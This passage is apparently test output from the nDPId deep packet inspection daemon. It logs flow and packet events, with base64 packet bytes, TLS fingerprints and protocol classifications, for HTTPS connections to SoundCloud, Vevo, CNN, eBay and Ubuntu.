+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1646482687080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482687080,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8\/\/dAAPAGz6fQVSiewKgBgABQs3Db1RKprHZMUaASOQif4AAAAgQFtAEDAwAEAggKWgQEFM1q7Wc="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482724450,"flow_last_seen":1646482724450,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482724450,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1646482724450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724450,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sa9AAEAG8DvAqAGAEkLEZspeAbv+oP0DAAAAAKAC+vBIlQAAAgQFtAQCCAqQpxNDAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1646482724458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724458,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8e2QAAPYGsIYSQsRmwKgBgAG7yl4LcBoC\/qD9BKAS\/\/+NCwAAAgQFoAQCCAqOOgLQkKcTQwEDAwg="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1646482724464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482724464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5sbFAAEAG7jzAqAGAEkLEZspeAbv+oP0EC3AaA4AYAfbA9QAAAQEICpCnE1COOgLQFgMBAgABAAH8AwM6K+sImNx3dIej3yQBfsHlSQyH5l4F8hLKFYurrt+jPCCUv6qySiadEZg7Gj4\/vX5jrLg\/JYOIeoxWa\/ahTy7RDQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5zb3VuZGNsb3VkLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDq1odYnjLE9YoHd\/igeLWhv14ukLQSyf98ZPyHkQn7OgAXAEEEKYWpJR9uHJSJZBwzi1pAC8cLX9iNXc5VMFPlSgV8HHXqYbwegIwyfo36+y7oUVZIFeBilQuBs9gLF4NzHajtKwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482724450,"flow_last_seen":1646482724464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482724464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482724472,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482734324,"flow_last_seen":1646482734324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482734324,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1646482734324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734324,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8YZNAAEAGvz7AqAGAl2XAXNyUAbtdgP2MAAAAAKAC+vB5pwAAAgQFtAQCCArbJaT6AAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1646482734331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734331,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJ9KXZcBcwKgBgAG73JRRJl9LXYD9jaAS\/\/87kQAAAgQFTAQCCArq9J312yWk+gEDAwk="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1646482734334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482734334,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5YZVAAEAGvT\/AqAGAl2XAXNyUAbtdgP2NUSZfTIAYAfZOkQAAAQEICtslpQXq9J31FgMBAgABAAH8AwNzr2vzd\/QT\/aDhJiSq61v58duBBGwTUq6z8fAzWLEV5CDNfOfaUUVYVfXW\/CDKtRAJ+tVWWsbZK9mMfW2g+Km+ogAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAh2ZXZvLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCPQyH3d70yPXK9aVtEdAPnRA9ZC5WTB071dNPYc9Y+CAAXAEEEeVVr0wfghCvKk8pB3rwr9lMyYYYxB1YwkLSYt9F3bwDqNkUCdiLkyXAxOw3adrfDZNG4HFWPlbGmWIPel1Si6AArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482734324,"flow_last_seen":1646482734334,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482734334,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":346,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01479{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":348,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4125,"flow_avg_l4_payload_len":687,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","server_names":"*.cache.vevo.com,*.cache.vevodev.com,*.cache.vevoprd.com,*.cache.vevostg.com,*.vevodev.com,*.vevoprd.com,*.vevostg.com,stg.vevo.ly,vevo.com,vevo.ly,vevo.pl,vevo.tv,vevoapi.com,vevocdn.com,vevolive.tv,vevosubmit.com,www.vevo.ly,www.vevo.pl,*.vevo.com,*.vevo.ly,*.vevo.pl,*.vevo.tv,*.vevoapi.com,*.vevocdn.com,*.vevolive.tv,*.vevosubmit.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.cache.vevo.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"ED:55:58:0E:19:94:FE:95:93:86:88:FE:30:27:DF:43:EB:74:17:C2"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482753482,"flow_last_seen":1646482753482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482753482,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1646482753482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753482,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SaBAAEAG1aPAqAGAFwFCT7wMAbtaGHg4AAAAAKAC+vA\/9AAAAgQFtAQCCAr10Gu5AAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1646482753504,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753504,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJkQXAUJPwKgBgAG7vAwZG5KKWhh4OaAS\/ogYMwAAAgQFtAQCCApuzQml9dBruQEDAwc="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1646482753507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482753507,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SaJAAEAG06TAqAGAFwFCT7wMAbtaGHg5GRuSi4AYAfZqJAAAAQEICvXQa9NuzQmlFgMBAgABAAH8AwOUyHhinsfe9G2IXNgY9L7xAzZ+DjB199btap4Cw89cViDuti6QLvXTxzS8GPAI\/LqrruRicKAVDOLPOdfZnGvHHQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtjZG4uY25uLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCyATmKdF69bnRwMVBRd98tu612XdMkfb0+p4HzFN6fBwAXAEEE+SEvSVfUiTeIP8IKKsjphsMZuVwTWztloapho\/r89Lhgv68xO7BDbwW8nmN\/dVf8z\/v3pQVdFakWyi7cuNIpiwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482753482,"flow_last_seen":1646482753507,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482753507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482753526,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482759960,"flow_last_seen":1646482759960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482759960,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1646482759960,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759960,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N8NAAEAGsY7AqAGAAhGNMZ+AAbsz0CpkAAAAAKAC+vAbqAAAAgQFtAQCCApTrIzgAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1646482759979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759979,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8VECEY0xwKgBgAG7n4Axx0rTM9AqZaAS\/ogIXwAAAgQFtAQCCAq1xN1AU6yM4AEDAwc="} +01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1646482759982,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482759982,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5N8VAAEAGr4\/AqAGAAhGNMZ+AAbsz0CplMcdK1IAYAfb4fgAAAQEIClOsjPe1xN1AFgMBAgABAAH8AwO90p\/YrOJd\/Z4tss7jqktThIJxJIB3e+qrLLFobtKKlyAX6YhgDO5LSOYTxZN2IGu+QsQ1WdlQy7VgjD2lE+VvBgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAx3d3cuZWJheS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgf8Mv24G6SSqxNEfrqm7W\/bejLWA6OGSZmHTWefPpxiwAFwBBBD+GtRBdEP9fCUeld\/IGhJTQe0q9+sY1uU3D5mNCoqM6EROqE0XBEIsVt1XPe0XwL5d6JRvhBZsY2OXTwlPA9KoAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482759960,"flow_last_seen":1646482759982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482759982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":358,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482760002,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482772264,"flow_last_seen":1646482772264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482772264,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1646482772264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772264,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SfdAAEAGtwnAqAGAuX2+FaeEAbviQ3M+AAAAAKAC+vAD2AAAAgQFtAQCCAo3btlLAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1646482772292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772292,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADcGCgG5fb4VwKgBgAG7p4RVAzgX4kNzP6AS\/ogvJwAAAgQFtAQCCAoh0SIcN27ZSwEDAwc="} +01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1646482772294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482772294,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SflAAEAGtQrAqAGAuX2+FaeEAbviQ3M\/VQM4GIAYAfaY1QAAAQEICjdu2Woh0SIcFgMBAgABAAH8AwMB8bRCQdqcx9fui+mF7VjuHN5SBb79arjGU4qYGthMOSBbTABCg135wJeFEPl+a8Oxzav9AsC9J9+l+IIaNAxYkQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFhc3NldHMudWJ1bnR1LmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCezVQBlUDf2SIx8m1xehLWY9pQKyvfH068Wwzre\/JcNwAXAEEEo09VNt2RkHEqlhHBw1nk6JbOlFIOJqgyxElu\/vwC+3XCJEwr43v+9rwXwcTyZXa+qtiIur9f6O0kVe2u0AJzEQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 